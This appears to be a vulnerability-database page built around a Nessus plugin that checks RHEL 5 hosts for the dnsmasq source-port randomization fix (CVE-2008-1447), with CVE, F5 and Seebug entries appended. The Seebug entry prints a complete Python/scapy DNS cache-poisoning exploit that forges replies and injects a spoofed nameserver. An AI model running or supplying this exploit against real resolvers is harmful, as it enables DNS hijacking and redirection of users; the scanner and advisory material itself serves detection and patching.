ID REDHAT-RHSA-2008-0789.NASL Type nessus Reporter This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2008-08-12T00:00:00
Description
An updated dnsmasq package that implements UDP source-port
randomization is now available for Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
Dnsmasq is a lightweight DNS forwarder and DHCP server. It is designed
to provide DNS and, optionally, DHCP, to a small network.
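The dnsmasq DNS resolver used a fixed source UDP port. With the port
known in advance, the 16-bit DNS transaction ID was the only value an
off-path attacker had to guess to forge a reply, which could have made
DNS spoofing attacks easier. dnsmasq has been updated to use random UDP
source ports, helping to make DNS spoofing attacks harder.
(CVE-2008-1447)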
All dnsmasq users are advised to upgrade to this updated package, which
upgrades dnsmasq to version 2.45 and resolves this issue.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2008:0789. The text
# itself is copyright (C) Red Hat, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration phase: when the plugin is loaded with `description` set, only
# the metadata below is declared and the script leaves through the exit(0) at
# the end of this block, before any host data is read.
if (description)
{
  # Plugin identity and revision.
  script_id(33865);
  script_version("1.40");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");

  # Cross-references used to correlate this finding with other feeds.
  script_cve_id("CVE-2008-1447");
  script_bugtraq_id(30131);
  script_xref(name:"RHSA", value:"2008:0789");
  script_xref(name:"IAVA", value:"2008-A-0045");

  script_name(english:"RHEL 5 : dnsmasq (RHSA-2008:0789)");
  script_summary(english:"Checks the rpm output for the updated package");

  script_set_attribute(attribute:"synopsis", value:"The remote Red Hat host is missing a security update.");

  # Advisory text shown in the report. The literal starts at column 0 because
  # its line breaks are part of the value.
  script_set_attribute(
    attribute:"description",
    value:
"An updated dnsmasq package that implements UDP source-port
randomization is now available for Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed
to provide DNS and, optionally, DHCP, to a small network.
The dnsmasq DNS resolver used a fixed source UDP port. This could have
made DNS spoofing attacks easier. dnsmasq has been updated to use
random UDP source ports, helping to make DNS spoofing attacks harder.
(CVE-2008-1447)
All dnsmasq users are advised to upgrade to this updated package, that
upgrades dnsmasq to version 2.45, which resolves this issue."
  );

  # Reference links: CVE page, upstream changelog, vendor erratum.
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2008-1447");
  script_set_attribute(attribute:"see_also", value:"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2008:0789");

  script_set_attribute(attribute:"solution", value:"Update the affected dnsmasq package.");

  # CVSS v2 base vector: network-reachable, low complexity, no authentication,
  # partial integrity impact, no confidentiality or availability impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
  # Temporal vector: proof-of-concept exploit, official fix, confirmed report.
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  # Metadata records that exploit code is publicly available.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # "local": the verdict is derived from the KB keys required below, i.e. data
  # gathered on the host, not from probing the DNS service over the network.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:dnsmasq");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.2");

  # Timeline: disclosure, vendor patch, plugin release.
  script_set_attribute(attribute:"vuln_publication_date", value:"2008/07/08");
  script_set_attribute(attribute:"patch_publication_date", value:"2008/08/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/08/12");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Red Hat Local Security Checks");

  # NOTE(review): ssh_get_info.nasl presumably populates the Host/* keys
  # required here - confirm against that plugin.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");
# Host applicability checks. Every guard hands a reason code to audit().
# NOTE(review): audit() presumably reports the reason and ends the script;
# confirm in audit.inc.

# Local checks must have been enabled for this host.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# The recorded release string must mention "Red Hat".
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release)
{
  audit(AUDIT_OS_NOT, "Red Hat");
}

# Capture "<major>" or "<major>.<minor>" from the release banner.
rhel_ver_match = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(rhel_ver_match))
{
  audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
}
os_ver = rhel_ver_match[1];

# Accept "5" and "5.x" only; the [^0-9] alternative keeps "50" and similar out.
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver))
{
  audit(AUDIT_OS_NOT, "Red Hat 5.x", "Red Hat " + os_ver);
}

# Without a collected package list there is nothing to compare against.
if (!get_kb_item("Host/RedHat/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Only x86_64, i386-i686 and s390 hosts are handled by this check.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu)
{
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
}
# Patch-state decision. Two evidence sources are used:
#   1. If the KB holds yum updateinfo data, ask whether RHSA-2008:0789 is
#      reported for this host.
#   2. Otherwise, run rpm_check() against dnsmasq-2.45-1.el5_2.1 for each
#      supported architecture.
# NOTE(review): both paths look only at advisory/package state. Neither reads
# dnsmasq's running configuration nor observes the source ports it actually
# uses, so a clean result means "fixed package present", not "source ports
# verified random". A port pinned in configuration (dnsmasq's query-port
# option) or rewritten by a NAT device in front of the resolver has to be
# verified separately.
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (empty_or_null(yum_updateinfo))
{
  # No updateinfo data: fall back to the per-architecture package comparison.
  dnsmasq_fixed_ref = "dnsmasq-2.45-1.el5_2.1";
  flag = 0;
  foreach dnsmasq_arch (make_list("i386", "s390x", "x86_64"))
  {
    # Each true return from rpm_check() counts as one finding.
    if (rpm_check(release:"RHEL5", cpu:dnsmasq_arch, reference:dnsmasq_fixed_ref)) flag++;
  }

  if (!flag)
  {
    # Nothing flagged: distinguish "package tested and fine" from
    # "dnsmasq not installed" using the list of tests that ran.
    tested = pkg_tests_get();
    if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else audit(AUDIT_PACKAGE_NOT_INSTALLED, "dnsmasq");
  }
  else
  {
    security_report_v4(
      port     : 0,
      severity : SECURITY_WARNING,
      extra    : rpm_report_get() + redhat_report_package_caveat()
    );
    exit(0);
  }
}
else
{
  rhsa = "RHSA-2008:0789";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (empty_or_null(yum_report))
  {
    # Empty report for this advisory: record the host as not affected by it.
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
  else
  {
    security_report_v4(
      port     : 0,
      severity : SECURITY_WARNING,
      extra    : yum_report
    );
    exit(0);
  }
}
{"id": "REDHAT-RHSA-2008-0789.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 : dnsmasq (RHSA-2008:0789)", "description": "An updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "published": "2008-08-12T00:00:00", "modified": "2008-08-12T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://www.tenable.com/plugins/nessus/33865", "reporter": "This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://access.redhat.com/errata/RHSA-2008:0789", "http://www.thekelleys.org.uk/dnsmasq/CHANGELOG", "https://access.redhat.com/security/cve/cve-2008-1447"], "cvelist": ["CVE-2008-1447"], "type": "nessus", "lastseen": "2021-01-17T13:06:15", "edition": 28, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1447"]}, {"type": "f5", "idList": ["SOL8938"]}, {"type": "openvas", "idList": ["OPENVAS:870106", "OPENVAS:1361412562310104103", "OPENVAS:1361412562310830506", "OPENVAS:136141256231065809", "OPENVAS:880206", "OPENVAS:880037", "OPENVAS:1361412562310122571", "OPENVAS:1361412562310835164", "OPENVAS:1361412562310880206", "OPENVAS:61383"]}, {"type": "centos", "idList": ["CESA-2008:0533", "CESA-2008:0533-03"]}, {"type": "nessus", "idList": ["SUSE_11_0_BIND-080708.NASL", "DEBIAN_DSA-1617.NASL", "FEDORA_2009-1069.NASL", "ORACLELINUX_ELSA-2008-0789.NASL", "CISCO-SA-20080708-DNSHTTP.NASL", "SUSE_BIND-5409.NASL", "DNS_NON_RANDOM_SOURCE_PORTS.NASL", "DEBIAN_DSA-1604.NASL", "FREEBSD_PKG_959D384D6B5911DD9D79001FC61C2A55.NASL", "SUSE_BIND-5410.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:68471"]}, {"type": "seebug", "idList": ["SSV:65607", "SSV:9165", "SSV:9178", "SSV:9168"]}, {"type": "redhat", "idList": ["RHSA-2008:0789", "RHSA-2008:0533"]}, {"type": "fedora", "idList": ["FEDORA:M69LJTSU027591"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0789", "ELSA-2008-0533"]}, {"type": "slackware", "idList": ["SSA-2008-334-01", "SSA-2008-205-01"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20222", "SECURITYVULNS:DOC:20146", "SECURITYVULNS:DOC:20145"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D"]}, {"type": "nmap", "idList": ["NMAP:DNS-RANDOM-SRCPORT.NSE", "NMAP:DNS-RANDOM-TXID.NSE"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1605-1:9D185", "DEBIAN:DSA-1619-2:7599F", 
"DEBIAN:DSA-1623-1:F6633", "DEBIAN:DSA-1619-1:BCCB7", "DEBIAN:DSA-1603-1:C7E04"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SPOOF/DNS/BAILIWICKED_HOST", "MSF:AUXILIARY/SPOOF/DNS/BAILIWICKED_DOMAIN"]}, {"type": "freebsd", "idList": ["655EE1EC-511B-11DD-80BA-000BCDF0A03B", "959D384D-6B59-11DD-9D79-001FC61C2A55"]}], "modified": "2021-01-17T13:06:15", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2021-01-17T13:06:15", "rev": 2}, "vulnersScore": 4.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0789. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33865);\n script_version(\"1.40\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0789\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"RHEL 5 : dnsmasq (RHSA-2008:0789)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. 
dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0789\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0789\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"dnsmasq-2.45-1.el5_2.1\")) 
flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "33865", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:dnsmasq", "cpe:/o:redhat:enterprise_linux:5.2"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:50:58", "description": "The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka \"DNS Insufficient Socket Entropy Vulnerability\" or \"the Kaminsky bug.\"", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2008-07-08T23:41:00", "title": "CVE-2008-1447", "type": "cve", "cwe": ["CWE-331"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1447"], "modified": "2020-03-24T18:19:00", "cpe": ["cpe:/a:isc:bind:4", "cpe:/a:isc:bind:9.2.9", "cpe:/a:isc:bind:8"], "id": "CVE-2008-1447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1447", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:isc:bind:4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8:*:*:*:*:*:*:*", 
"cpe:2.3:a:isc:bind:9.2.9:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "edition": 1, "description": "This security advisory describes a BIND 8 and BIND 9 vulnerability which allows remote attackers to spoof DNS traffic using cache poisoning techniques against recursive resolvers. With the exception of FirePass, the F5 products listed as **affected** in this security advisory run a version of BIND that is affected by this vulnerability. Although FirePass does not run the BIND software, its local DNS resolver client is vulnerable to DNS cache poisoning techniques described in CVE-2008-1447 and VU#800113.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447>\n\n<http://www.kb.cert.org/vuls/id/800113>\n\nF5 Product Development tracked this issue as CR99135 for BIG-IP LTM, GTM, ASM, WebAccelerator and PSM and it was fixed in versions 9.4.6 and 10.0.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, PSM, and WebAccelerator release notes.\n\nThis issue was also fixed in Enterprise Manager version 1.7.0. For information about upgrading, refer to the Enterprise Manager release notes.\n\nF5 Product Development tracked this issue as CR99135 for the BIG-IP LTM 9.6 software branch.\n\nAdditionally, this issue was fixed in hotfix versions BIG-IP-9.3.1-HF4, BIG-IP-9.4.4-HF3, BIG-IP-9.4.5-HF2, and BIG-IP-9.6.1-HF2. 
You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nTo view a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nF5 Product Development tracked this issue as CR102424 and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/kb/en-us/products/firepass.html>) release notes.\n\nThis issue still exists in the FirePass 5.x branch.\n\n**Obtaining and installing patches**\n\nYou can download patches from the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for the following products and versions:\n\n**Important**: If you installed Hotfix-102424, you must remove Hotfix-102424 before upgrading to FirePass version 6.0.2 or an earlier version of FirePass software. Failure to remove Hotfix-102424 prior to an upgrade may result in the FirePass Administrative Console and logon page becoming inaccessible after the upgrade. 
You can safely upgrade to FirePass version 6.0.3 after installing Hotfix-102424.\n\nProduct | Version | Hotfix | Installation File \n---|---|---|--- \nFirePass | 6.0.2 | Hotfix-102424 | HF-102424-1-6.02-ALL-0.tar.gz.enc \nFirePass | 6.0.1 | Hotfix-102424 | HF-102424-1-6.01-ALL-0.tar.gz.enc \nFirePass | 5.5.2 | Hotfix-102424 | HF-102424-1-5.52-ALL-0.tar.gz.enc \nFirePass | 5.5.1 | Hotfix-102424 | HF-102424-1-5.51-ALL-0.tar.gz.enc \nFirePass | 5.5.0 | Hotfix-102424 | HF-102424-1-5.5-ALL-0.tar.gz.enc \n \n**Note**: For more information about installing the hotfixes listed above, refer to the readme file on the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for your version-specific hotfix.\n\nFor information about downloading software, refer to SOL167: Downloading software from F5.\n\n**Workaround**\n\nIf you enabled DNS recursion in BIND on an F5 product (excluding FirePass), you can work around this issue by disabling DNS recursion. For information about enabling and disabling DNS recursion in BIND, refer to the BIND documentation at default <http://www.isc.org/products/BIND/>.\n\n**Important**: The BIND vulnerability is only exploitable if recursion has been enabled in BIND. F5 LTM 9.x, GTM 9.x, ASM 9.x, Link Controller 9.x, WebAccelerator 9.x, PSM, Firepass 5.x and 6.x, and Enterprise Manager 1.x products do not enable recursion by default, with the exception of the BIG-IP LTM MSM module configured for **local bind**.\n\nTo minimize the risk for FirePass platforms, configure FirePass to use a local, secure name server for DNS resolution. 
Additionally, implement anti-spoofing mechanisms on your DNS servers and/or network firewalls.\n\n**Note**: You can configure the name servers in the FirePass Administrative Console on the Device Management > Configuration > Network Configuration page under the **DNS** tab.\n", "modified": "2013-03-19T00:00:00", "published": "2008-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8938.html", "id": "SOL8938", "type": "f5", "title": "SOL8938 - BIND DNS cache poisoning vulnerability - CVE-2008-1447 - VU#800113", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T21:33:51", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17308", "id": "SSV:17308", "sourceData": "\n from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = "X.X.X.X"\n# Vulnerable recursive DNS server\ntargetdns = "X.X.X.X"\n# Authoritative NS for the target domain\nsrcdns = ["X.X.X.X"]\n\n# Domain to play with\ndummydomain = ""\nbasedomain = ".example.com."\n# sub-domain to claim authority on\ndomain = "sub.example.com."\n# Spoofed authoritative DNS for the sub-domain\nspoof="ns.evil.com."\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = "a" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, 
qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint "Successfully poisonned our target with a dummy record !!"\n\t\t\tbreak\n\texcept:\n\t\tprint "Poisonning failed"\n\n# milw0rm.com [2008-07-24]\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17308"}, {"lastseen": "2017-11-19T21:33:50", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": 